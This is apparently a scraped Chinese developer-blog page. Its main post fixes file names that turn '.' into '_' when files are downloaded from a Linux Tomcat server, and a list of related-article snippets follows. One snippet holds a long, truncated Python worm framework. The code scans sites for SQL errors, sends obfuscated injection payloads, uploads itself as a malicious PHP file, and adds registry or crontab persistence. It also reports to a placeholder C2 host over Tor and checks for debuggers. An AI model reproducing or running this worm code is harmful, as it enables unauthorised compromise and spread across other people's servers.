关于win读取Linux服务器文件地址“.”变成“_”的问题

最新推荐文章于 2023-01-04 11:41:34 发布
最新推荐文章于 2023-01-04 11:41:34 发布 · 129 阅读 · 0
文章标签:

#linux #mysql #jsp #规则 #Windows

本文解决使用公司规则(旗正4.0)做jsp页面的下载时,文件名乱码的问题。通过直接将上传文件地址保存到MySQL数据库中,避免了文件名乱码现象,并提供了切割字符串获取正确文件地址的方法。
前两天用公司规则(旗正4.0)做jsp页面的下载,出现下载时,弹出窗口的文件名“xx.zip”变成了“xx_zip”,而路径地址是正确的,下载的时候会下载为“xxx.partial”文件,困扰了好久。网上也没有找到明确的信息 :cry: 。
经过多次尝试,终于找到了解决的方法:
我在上传文件的时候,直接将上传的地址保存到MySQL数据库中。如“/usr/gx/apache-tomcat-6.0.43/webapps/file/xx.zip”,这样在下载的时候,只需读取文件地址就可以了。但在win本地下载Linux服务器中的文件时,读取的是“/webapps”后面的地址,即只读取目录“/file/xx.zip”,就可以对xx.zip文件进行下载。“.”变“_”的原因也是读取的文件地址出了问题。
所以只需要切割字符串“/usr/gx/apache-tomcat-6.0.43/webapps/file/xx.zip”获取“/file/xx.zip”就可以对文件进行下载了。
menu_win.c.tar.gz_linux ncur
09-22
标题中的"menu_win.c.tar.gz_linux ncur"表明这是一个关于ncurses库的菜单程序示例,源代码文件名为"menu_win.c",并且已经打包成tar.gz格式的压缩文件,适用于Linux系统。 ncurses库的核心功能包括: 1. 屏幕管理...
in_win.rar_Windows编程_Unix_Linux_
08-11
这个文件似乎包含了关于Windows编程的信息,同时也提及了Unix和Linux。描述中提到的“windows 95 mouse and joystick code”暗示我们这个压缩包可能包含了一些与Windows 95操作系统相关的鼠标和游戏杆(joystick)的...
Linux下web项目中File地址错误问题
cuiweiqing1988的专栏
07-21 308
String path = servletContext.getRealPath("/"); File root = new File(path); boolean b = root.exist(); //这句话在windows下执行没问题 b=true,tomcat下、domain下都好用 //在Linux下执行b=false,什么原因导致的呢? //实际输出跟了一下,发现得到的字符...
LinuxWindows文本格式之间的转化
weixin_33694172的博客
12-13 499
原理: 在Linux中,文本文件"\n"表示回车换行,而Windows"\r\n"表示回车换行。所以在Linux中使用Windows的文本文件常常会出现错误 因为装了双系统,所以有时一些文件在两个系统之间共享,不过之前一直没有很在意这个问题.windows系统中用Word或者Notepad++打开文件,在linux系统中一直用的是vim...
Linux如何查看文件地址
oldboyedu1的博客
01-04 1675
Linux系统中,是可以查看文件地址的,而且通过命令就可以完成,其中常见的命令是:whereis命令和which命令。which命令的作用是,在PATH变量指定的路径中,搜索某个系统命令的位置,并且返回第一个搜索结果。也就是说,使用which命令,就可以看到某个系统命令是否存在,以及执行的到底是哪一个位置的命令。说明:以上输出信息从左至右分别为查询的程序名、bash路径、bash的man手册页路径。whereis命令是定位可执行文件、源代码文件、帮助文件文件系统中的位置。如果省略参数,则返回所有信息。
访问 Linux 服务器上的文件(以图片为例)
词庸
04-09 2万+
问题由来: 编写服务端代码时,将前端传来的图片保存至服务器,并将路径保存到数据库中,当前端需要访问该图片时,不想利用二进制流传输,而是让前端利用 url 直接访问该图片 如图,Linux 服务器 /root/photo 路径下保存有图片,需要在浏览器中可以直接根据 url 访问到 此 Linux 服务器需要配置有 Tomcat 进入 Tomcat 的 conf 文件夹下编辑 se...
linux查找一个文件在哪里,【服务器运维】linux查找文件在哪一个文件
weixin_34131379的博客
05-01 2608
linux查找文件在哪一个文件linux下查找文件能够运用find敕令比方:find / -name tnsnames.ora查到:/opt/app/oracle/product/10.2/network/admin/tnsnames.ora/opt/app/oracle/product/10.2/network/admin/samples/tnsnames.ora无毛病查找技能:在Linux...
FileZilla_3.54.1_win64ftp软件.rar
08-05
这个版本是3.54.1,提供稳定且高效的服务,使得用户能够安全地上传、下载以及管理远程服务器上的文件。让我们深入探讨FileZilla的核心功能和FTP的相关知识点。 1. FTP基础:FTP是一种互联网协议,用于在两台计算机...
libiec61850-0.7.7.gz_IEC61850_IEC61850服务器_IED_goose_libiec61850
07-14
此库通过标准C编写,提供IEC61850的MMS协议实现...13 硬件提取层和执行可以在LinuxWIN32下 14 转变工具可以将SCL文件转成静态IED模型 15 转变工具可以将SCL文件转变为服务器配置文件 16 文件目录浏览和文件读服务
URL.zip_url_url decode_url linux_url 解码
09-19
Win32和Linux之间进行跨平台编程,我们需要关注文件系统的差异,如路径分隔符、符号链接处理以及I/O函数的兼容性。C++17引入了`<filesystem>`库,提供了跨平台的文件系统操作,可以用来统一处理不同平台的路径。...
linux系统配置文件
popotang
02-21 5300
1:/etc/sysconfig/i18n(语言配置文件).2:/etc/sysconfig/network-scripts/ifcfg-eth0(eth0配置文件).3:/boot/grub/grub.conf(grup配置文件) 或/boot/grub/menu.list.4:/etc/passwd:系统用户数据库文件.5:/etc/group:组的数据库文件.6:/etc/gshadow(存
解决web项目对Linux服务器上传文件路径的问题
wilson_m的博客
07-05 1万+
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;昨天将一个JavaWeb项目部署到linux服务器上,对功能进行了一个测试,其中有一个文件上传的功能。在win环境下测试没有任何的问题文件能够上传和下载,但是在Linux下就有问题了,文件上传时候的路径出现了差错,没有上传的指定的文件. 文件上传的代码在win环境下的代码为
linux服务器之间传输文件的四种方式
扎扎实实写代码的专栏
06-08 3万+
转自:http://www.jb51.net/article/82608.htm本文为大家分享了linux服务器之间传输文件的四种方式,供大家参考,具体内容如下 1. scp 【优点】简单方便,安全可靠;支持限速参数 【缺点】不支持排除目录 【用法】 scp就是secure copy,是用来进行远程文件拷贝的。数据传输使用 ssh,并且和ssh 使用相同的认证方式,提供相同的安全保证 。
linux服务器的内存文件在哪里,Linux服务器参数查看命令
weixin_29533443的博客
04-28 475
CPU信息查看:cpu信息文件位置:cat /etc/cpuinfo 或者cat /proc/cpuinfo查看cpu数:cat /etc/cpuinfo | grep processor | wc -l查看cpu型号:cat /etc/cpuinfo | grep 'model name'processor :系统中逻辑处理核的编号。对于单核处理器,则课认为是其CPU编号,对于多核处理器则可以...
Linux查看文件路径
热门推荐
葬爱家族王富贵
12-21 7万+
荆轲刺秦王 Linux下有两个命令可以查看命令或者文件所在的位置 1.which which 用来查看当前要执行的命令所在的路径 举个例子: [root@admin ~]# which python /usr/bin/python 意思就是说:如果我直接输入 python ,那么输出的就是 python 命令的默认执行路径 即: /usr/bin/python wh
linux服务器文件生成url,服务器的“文件系统路径”和“URL”详解
weixin_31092081的博客
04-29 1617
最常用的配置段是针对“文件系统”和“网络空间(URL)”特定位置的配置段。首先必须理解“文件系统”和“网络空间”这两个概念的区别。1、文件系统是指操作系统所看见的磁盘视图。比如:在 Unix 或 Linux 文件系统中,Apache 会被默认安装到 /usr/local/apache2 目录下。2、相反,“网络空间”是网络被 Web 服务器发送及被客户在浏览器中所看到的视图。所以,如果 中的路径...
linux 服务器文件虚拟路径配置
qq_38579468的博客
05-09 1205
package com.ruoyi.web.core.config; import java.io.File; import org.springframework.beans.factory.annotation.Value; import org.springframework.context.annotation.Configuration; import org.springfram...
java路径中/的问题
Java 初学者
05-18 533
windows支持两种文件分隔符“/”和“\” 且使用“/”时不需要转义 编写创建文件的代码应注意一点,在windows系统中路径中使用“\”,同时需要再加一个转义的“\”,即形成了类似如下的路径:   “path\\fileName”   此种路径在windows系统没什么不对,但是到了linux系统会出现问题,在linux系统会生成名为“path\”的一个文件夹,当你再...
服务器上传文件路径变为\fakepath问题
weixin_45718351的博客
10-19 1288
问题出现在IE8之后,做如下修改即可 工具 -> Internet选项 -> 安全 -> 自定义级别 -> 找到“其他”中的“将本地文件上载至服务器时包含本地目录路径”,选中“启用”即可。
import base64 import random import string import hmac import hashlib import time import sys import ctypes import os from urllib.parse import urlparse, quote import requests import socket from Crypto.Cipher import AES, PKCS1_OAEP from Crypto.PublicKey import RSA from Crypto.Util.Padding import pad, unpad import logging import socks import stem.process # 配置日志记录器 logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s') # 全局变量,用于密钥轮换 current_key_index = 0 symmetric_keys = [] for _ in range(5): symmetric_keys.append(''.join(random.choices(string.ascii_letters + string.digits, k=16)).encode('utf - 8')) # 动态HMAC算法列表 hmac_algorithms = [hashlib.sha256, hashlib.sha384, hashlib.sha512] class Scanner: def __init__(self): self.targets = [] self.persistence_file = 'targets.txt' self.load_targets() def add_target(self, url): self.targets.append(url) self.save_targets() def find_vulnerable_hosts(self): vulnerable_hosts = [] for target in self.targets: if self._check_vulnerable(target): vulnerable_hosts.append(target) return vulnerable_hosts def _check_vulnerable(self, target): try: socket.gethostbyname(urlparse(target).hostname) except socket.gaierror: logging.error(f"无法解析主机名: {urlparse(target).hostname}") return False if not urlparse(target).scheme: target = 'http://' + target headers = { 'User - Agent': self._generate_random_user_agent(), 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8', 'Referer': target } paths_to_check = self._generate_paths() for path in paths_to_check: try: time.sleep(random.uniform(1, 3)) response = requests.get(target + path, headers=headers) if response.status_code == 200: if self._is_suspicious(response.text): logging.info(f"{target} 可能存在漏洞,状态码: {response.status_code}") return True else: logging.info(f"{target} 状态码200但内容无异常,路径: {path}") else: logging.info(f"{target} 状态码非200,路径: {path},状态码: {response.status_code}") except requests.RequestException as e: logging.error(f"Check vulnerable request exception: {e}") return False def _generate_random_user_agent(self): user_agents = [ 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0' ] return random.choice(user_agents) def _generate_paths(self): common_paths = ['/login.php', '/admin.php', '/index.php'] random_paths = ['/' + ''.join(random.choices(string.ascii_lowercase, k=random.randint(5, 10))) for _ in range(3)] return common_paths + random_paths def _is_suspicious(self, response_text): keywords = ['sql error', 'unexpected token', 'database error'] for keyword in keywords: if keyword in response_text.lower(): return True return False def load_targets(self): try: with open(self.persistence_file, 'r') as f: self.targets = f.read().splitlines() except FileNotFoundError: pass def save_targets(self): with open(self.persistence_file, 'w') as f: for target in self.targets: f.write(target + '\n') class PropagationEngine: def propagate_to_target(self, target, payload): upload_paths = ['/upload.php', '/file_upload.php', '/upload_file.php'] for upload_path in upload_paths: try: time.sleep(random.uniform(1, 3)) files = {'file': ('malicious_file.php', payload)} headers = self._generate_headers() response = requests.post(target + upload_path, files=files, headers=headers) if response.status_code == 200: logging.info(f"成功传播到目标 {target}") return True else: logging.info(f"传播到目标 {target} 失败,状态码: {response.status_code}") except requests.RequestException as e: logging.error(f"传播到目标 {target} 时出错: {e}") return False def _generate_headers(self): headers = { 'User - Agent': self._generate_random_user_agent(), 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8' } # 这里可以添加更多处理CSRF token等逻辑,暂时先留空 return headers def _generate_random_user_agent(self): user_agents = [ 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0' ] return random.choice(user_agents) class MultiArchPayload: def __init__(self): self.payload_segments = [] self.encoding_methods = [self._base64_encode, self._hex_encode, self._url_encode] def generate_mutation(self, base_payload): self.payload_segments = [] num_segments = random.randint(3, 5) segment_size = len(base_payload) // num_segments remaining = len(base_payload) % num_segments start = 0 for i in range(num_segments): end = start + segment_size if i == num_segments - 1: end += remaining segment = base_payload[start:end] encoding_method = random.choice(self.encoding_methods) encoded_segment = encoding_method(segment) self.payload_segments.append(encoded_segment) return self.payload_segments def _base64_encode(self, data): return base64.b64encode(data).decode('utf - 8') def _hex_encode(self, data): return data.hex() def _url_encode(self, data): return quote(data.decode('utf - 8')) class WormFramework: def __init__(self): self.payload_generator = MultiArchPayload() self.vulnerability_scanner = Scanner() self.propagator = PropagationEngine() self.rsa_key = RSA.generate(2048) self.private_key = self.rsa_key.export_key() self.public_key = self.rsa_key.publickey().export_key() self.worm_code = self._read_worm_code() self.c2_server_url = 'http://your_c2_server.com' self.tor_process = None def generate_payload(self, base_payload): return self.payload_generator.generate_mutation(base_payload) def scan_targets(self): targets = self.vulnerability_scanner.find_vulnerable_hosts() logging.info(f"发现的可能存在漏洞的目标: {targets}") return targets def exploit_target(self, target, base_payload): if not urlparse(target).scheme: target = 'http://' + target injection_path = self._get_injection_path(target) if not injection_path: return False malicious_payload_segments = self.generate_payload(base_payload) success = False max_retries = 3 for segment in malicious_payload_segments: for retry in range(max_retries): try: time.sleep(random.uniform(1, 3)) url = target + injection_path + 'id=' + segment headers = { 'User - Agent': self.vulnerability_scanner._generate_random_user_agent(), 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8', 'Referer': target } logging.info(f"尝试发送恶意请求: {url}") response = requests.get(url, headers=headers) if response.status_code == 200: logging.info(f"恶意请求成功,状态码: {response.status_code}") success = True break else: logging.info(f"恶意请求失败,状态码: {response.status_code}") except requests.RequestException as e: logging.error(f"Exploit SQL injection request exception: {e}") if retry < max_retries - 1: time.sleep(2) continue if success: break if not success: logging.info("所有恶意负载注入尝试均失败。") return success def inject_payload(self, target, base_payload): logging.info(f"正在向目标 {target} 注入有效载荷") self._send_encrypted_payload(target, base_payload) def propagate(self, base_payload): global current_key_index logging.info("开始传播流程") if self._should_delay(): time.sleep(random.randint(3600, 7200)) # 延迟1 - 2小时 for target in self.scan_targets(): logging.info(f"开始检测并尝试利用目标 {target}") if self.exploit_target(target, base_payload): encrypted_payload = self._encrypt_payload(self.worm_code) if self.propagator.propagate_to_target(target, encrypted_payload): self._install_persistence(target) current_key_index = (current_key_index + 1) % len(symmetric_keys) self._send_status_to_c2('Propagation success') def _get_injection_path(self, target): paths = ['/vulnerable_page.php?', '/inject.php?'] for path in paths: try: response = requests.get(target + path) if response.status_code == 200: return path except requests.RequestException: pass return None def _encrypt_payload(self, base_payload): global current_key_index session_key = symmetric_keys[current_key_index] cipher_aes = AES.new(session_key, AES.MODE_CBC) padded_data = pad(base_payload, AES.block_size) encrypted_data = cipher_aes.encrypt(padded_data) cipher_rsa = PKCS1_OAEP.new(RSA.import_key(self.public_key)) encrypted_session_key = cipher_rsa.encrypt(session_key) iv = base64.b64encode(cipher_aes.iv).decode('utf - 8') encrypted_session_key_b64 = base64.b64encode(encrypted_session_key).decode('utf - 8') encrypted_data_b64 = base64.b64encode(encrypted_data).decode('utf - 8') hmac_algorithm = random.choice(hmac_algorithms) h = hmac.new(session_key, encrypted_data, hmac_algorithm) hmac_digest = base64.b64encode(h.digest()).decode('utf - 8') combined_data = f"{encrypted_session_key_b64}:{iv}:{encrypted_data_b64}:{hmac_digest}:{hmac_algorithm.__name__}" return combined_data.encode('utf - 8') def _decrypt_payload(self, encrypted_payload): global current_key_index parts = encrypted_payload.decode('utf - 8').split(':') encrypted_session_key_b64, iv_b64, encrypted_data_b64, hmac_digest_b64, hmac_algorithm_name = parts encrypted_session_key = base64.b64decode(encrypted_session_key_b64) iv = base64.b64decode(iv_b64) encrypted_data = base64.b64decode(encrypted_data_b64) received_hmac_digest = base64.b64decode(hmac_digest_b64) hmac_algorithm = getattr(hashlib, hmac_algorithm_name) session_key = symmetric_keys[current_key_index] h = hmac.new(session_key, encrypted_data, hmac_algorithm) expected_hmac_digest = h.digest() if hmac.compare_digest(received_hmac_digest, expected_hmac_digest): cipher_rsa = PKCS1_OAEP.new(RSA.import_key(self.private_key)) session_key = cipher_rsa.decrypt(encrypted_session_key) cipher_aes = AES.new(session_key, AES.MODE_CBC, iv) decrypted_data = unpad(cipher_aes.decrypt(encrypted_data), AES.block_size) return decrypted_data else: logging.error("HMAC验证失败,数据可能被篡改") return None def _read_worm_code(self): with open(__file__, 'rb') as f: return f.read() def _install_persistence(self, target): if sys.platform.startswith('win'): # 注册表自启动 key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, winreg.KEY_SET_VALUE) winreg.SetValueEx(key, "worm_service", 0, winreg.REG_SZ, sys.executable) winreg.CloseKey(key) elif sys.platform.startswith('linux'): # 之前的crontab方式 command = f"echo '*/5 * * * * python3 {os.path.abspath(__file__)}' | crontab -" try: response = requests.post(target + '/execute_command.php', data={'command': command}) if response.status_code == 200: logging.info(f"在目标 {target} 上成功安装持久化机制") else: logging.info(f"在目标 {target} 上安装持久化机制失败,状态码: {response.status_code}") except requests.RequestException as e: logging.error(f"在目标 {target} 上安装持久化机制时出错: {e}") def _send_status_to_c2(self, status): try: socks.set_default_proxy(socks.SOCKS5, "127.0.0.1", 9050) socket.socket = socks.socksocket response = requests.post(self.c2_server_url + '/status', json={'status': status}, verify=False) if response.status_code == 200: logging.info("成功向C2服务器发送状态") else: logging.error(f"向C2服务器发送状态失败,状态码: {response.status_code}") except requests.RequestException as e: logging.error(f"向C2服务器发送状态时出错: {e}") finally: socket.socket = socket._realsocket def _should_delay(self): # 简单的延迟触发逻辑 return random.random() < 0.5 def _check_debugger_present(self): kernel32 = ctypes.windll.kernel32 return kernel32.IsDebuggerPresent() def _check_cpu_cores(self): if sys.platform.startswith('win'): kernel32 = ctypes.windll.kernel32 system_info = ctypes.wintypes.SYSTEM_INFO() kernel32.GetSystemInfo(ctypes.byref(system_info)) return system_info.dwNumberOfProcessors elif sys.platform.startswith('linux'): return os.cpu_count() def _start_tor(self): try: self.tor_process = stem.process.launch
最新发布
10-19
用户的问题集中在蠕虫与病毒的区别,而这段代码展示了一个实际的蠕虫实现框架。 首先,代码是一个Python实现的蠕虫框架,包含扫描、传播、负载生成等功能。关键组件包括: 1. Scanner类:扫描目标主机,检测漏洞 2....
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值